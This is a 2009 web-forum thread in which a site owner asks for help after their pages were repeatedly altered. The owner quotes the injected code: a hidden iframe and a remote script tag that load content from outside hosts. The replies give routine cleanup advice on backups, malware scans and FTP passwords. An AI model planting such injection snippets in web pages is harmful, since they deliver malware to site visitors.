1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

horrible virus

Discussion in 'Site & Server Administration' started by Vebtools, Oct 15, 2009.

  1. #1
    My website working fine from last 10 years but from 2 days there is something wrong :-s my all files edit by some one and entred the following code

    <body style="text-align: center"><div style="display:none">dnmukleaujsivpctwdcyfwtwojuynts<iframe width=847 height=240 src="http://icq-tel.ru:8080/index.php" ></iframe></div>
    Code (markup):
    <script src=http://anydisk.anyprinting.com/webfolder/index.php ></script>
    Code (markup):

    i removed this code from every where.. my web work fine but after few mints the same issue some one edit all files
    SEMrush

    my hosting providers says every thing fine there

    let me know what should i do now
     
    Vebtools, Oct 15, 2009 IP
    SEMrush
  2. SecureCP

    SecureCP Guest

    Messages:
    227
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #2
    upload a clean backups, clean your local computer of malware and viruses, and change your ftp passwords. It will work wonders.
     
    SecureCP, Oct 15, 2009 IP
  3. Nerv

    Nerv Active Member

    Messages:
    568
    Likes Received:
    4
    Best Answers:
    1
    Trophy Points:
    70
    #3
    This thing probably got on your website by your ftp program. Clean up your computer and make sure you do not save your ftp password in your ftp program.
     
    Nerv, Oct 15, 2009 IP
  4. redone975

    redone975 Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #4
    I'm going through the process of falling the above directions. I've pulled down altered files.

    Right now, I'm looking for software to sweep my computer. What types of applications should I use? Specifically, which applications do you suggest?

    Am curious, how does this virus/hacking work? I'm concerned if they're accessing my FTP client (Transmit), are they accessing my computer too?

    Thanks in advance for any help/information.
    Mike
     
    redone975, Oct 15, 2009 IP
  5. thewebhostingdir

    thewebhostingdir Well-Known Member

    Messages:
    3,850
    Likes Received:
    84
    Best Answers:
    0
    Trophy Points:
    165
    #5
    Kindly check the FTP logs and find the IP address from where the malicious code was uploaded in your script and block that particular IP address in your system.

    Moreover, kindly follow below mentioned procedure to avoid such issues in future:

    1. Kindly upgrade your third party installed software, scripts, any templates etc in your domain (if any) on regular basis.
    2. Change the control panel and FTP passwords of your domain on regular basis.
    3. Check the web site contents in your domain and remove any suspicious files and/or folders which you have not uploaded.
    4. Check the permissions of the files and folders and make sure that you have assigned the permissions correctly.
     
    thewebhostingdir, Oct 15, 2009 IP
  6. Vebtools

    Vebtools Well-Known Member

    Messages:
    2,619
    Likes Received:
    32
    Best Answers:
    0
    Trophy Points:
    145
    #6
    i deleed all my data from server and then restore one week onld data.. after that i have scanned my computer with AVAST antivirus.. now web working fine but i am affaired to upload file or not.. :-s i did i know that virus is removed now?... if there any software to find the spesific words from the whole web
     
    Vebtools, Oct 15, 2009 IP
  7. SecureCP

    SecureCP Guest

    Messages:
    227
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #7
    Don't forget to change your passwords. A script can be written to remove all these.
     
    SecureCP, Oct 16, 2009 IP